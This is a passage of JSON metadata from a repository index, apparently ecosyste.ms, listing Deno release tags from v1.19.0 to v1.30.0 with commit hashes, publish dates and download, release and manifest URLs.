0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:githu